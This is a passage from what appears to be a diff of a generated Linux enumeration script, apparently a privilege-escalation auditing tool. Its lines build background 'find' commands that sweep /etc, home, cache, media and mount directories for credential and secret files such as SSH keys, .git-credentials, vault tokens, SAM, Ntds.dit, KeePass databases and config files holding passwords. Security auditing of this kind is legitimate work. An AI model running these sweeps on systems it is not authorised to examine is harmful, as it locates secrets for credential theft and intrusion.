-name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" 
-o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name 
\"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name 
\"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name 
\"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name 
\"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name 
\"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name 
\"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"*knockd*\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name 
\".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name 
\".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"system.d\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. 
